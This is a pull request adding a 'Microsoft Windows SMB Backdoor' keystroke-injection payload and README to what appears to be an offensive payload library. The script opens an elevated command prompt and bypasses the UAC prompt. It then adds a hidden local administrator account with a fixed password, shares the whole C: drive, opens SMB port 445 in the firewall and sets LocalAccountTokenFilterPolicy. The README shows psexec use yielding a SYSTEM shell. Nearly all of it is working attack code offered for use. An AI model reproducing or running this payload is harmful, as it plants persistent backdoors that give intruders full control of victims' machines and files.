### PR TITLE
Add "Microsoft Windows" SMB Backdoor

### DIFF
--- a/payloads/library/remote_access/win_smb-backdoor/README.md
+++ b/payloads/library/remote_access/win_smb-backdoor/README.md
@@ -1,0 +1,36 @@
+# "Microsoft Windows" SMB Backdoor
+
+- Title:         "Microsoft Windows" SMB Backdoor
+- Author:        TW-D
+- Version:       1.0
+- Target:        Microsoft Windows
+- Category:      Remote Access
+
+## Description
+
+1) Adds a user account (RD_User:RD_P@ssW0rD).
+2) Adds this local user to local administrator group.
+3) Shares "C:" directory (RD_SHARE).
+4) Adds a rule to the firewall.
+5) Sets a value to "LocalAccountTokenFilterPolicy" to access the "C:" with a local account.
+6) Hides this user account.
+
+## Exploitation
+
+>
+> The connection identifiers will be those defined by the values : **RD_User** and **RD_P@ssW0rD**.
+>
+
+```
+hacker@hacker-computer:~$ python3 /opt/impacket/examples/psexec.py ./RD_User:RD_P@ssW0rD@<TARGET>
+C:\WINDOWS\system32> whoami
+nt authority\system
+```
+
+>
+> The connection identifiers and the share name will be those defined by the values : **RD_SHARE**, **RD_User** and **RD_P@ssW0rD**.
+>
+
+```
+smb://<TARGET>/RD_SHARE/
+```

--- a/payloads/library/remote_access/win_smb-backdoor/payload.txt
+++ b/payloads/library/remote_access/win_smb-backdoor/payload.txt
@@ -1,0 +1,77 @@
+REM #
+REM # Title:            "Microsoft Windows" SMB Backdoor
+REM #
+REM # Description:      
+REM #                   1) Adds a user account (RD_User:RD_P@ssW0rD).
+REM #                   2) Adds this local user to local administrator group.
+REM #                   3) Shares "C:" directory (RD_SHARE).
+REM #                   4) Adds a rule to the firewall.
+REM #                   5) Sets a value to "LocalAccountTokenFilterPolicy" to access the "C:" with a local account.
+REM #                   6) Hides this user account.
+REM #
+REM # Author:           TW-D
+REM # Version:          1.0
+REM # Category:         Remote Access
+REM # Target:           Microsoft Windows
+REM #
+REM # TESTED ON
+REM # ===============
+REM # Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
+REM # Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
+REM #
+REM # REQUIREMENTS
+REM # ===============
+REM # The target user must belong to the 'Administrators' group.
+REM #
+
+REM ######## INITIALIZATION ########
+
+DELAY 2000
+
+REM ######## STAGE1 ########
+
+GUI r
+DELAY 3000
+STRING cmd
+DELAY 1000
+CTRL-SHIFT ENTER
+DELAY 3000
+LEFTARROW
+DELAY 5000
+ENTER
+DELAY 5000
+
+REM ######## STAGE2 ########
+
+STRING NET USER RD_User RD_P@ssW0rD /ADD
+ENTER
+DELAY 1500
+
+STRING NET LOCALGROUP Administrators RD_User /ADD
+ENTER
+DELAY 1500
+
+REM ######## STAGE3 ########
+
+STRING NET SHARE RD_SHARE=C:\ /GRANT:RD_User,FULL /REMARK:"RRemote DShare"
+ENTER
+DELAY 1500
+
+STRING NETSH ADVFIREWALL FIREWALL ADD RULE NAME="Server Message Block for RD" PROTOCOL=TCP LOCALPORT=445 DIR=IN ACTION=ALLOW PROFILE=PUBLIC,PRIVATE,DOMAIN
+ENTER
+DELAY 1500
+
+REM ######## STAGE4 ########
+
+STRING REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1
+ENTER
+DELAY 1500
+
+STRING REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /f /v RD_User /t REG_DWORD /d 0
+ENTER
+DELAY 1500
+
+REM ######## FINISH ########
+
+STRING EXIT
+ENTER


### PR DESCRIPTION
1) Adds a user account (RD_User:RD_P@ssW0rD).
2) Adds this local user to local administrator group.
3) Shares "C:" directory (RD_SHARE).
4) Adds a rule to the firewall.
5) Sets a value to "LocalAccountTokenFilterPolicy" to access the "C:" with a local account.
6) Hides this user account.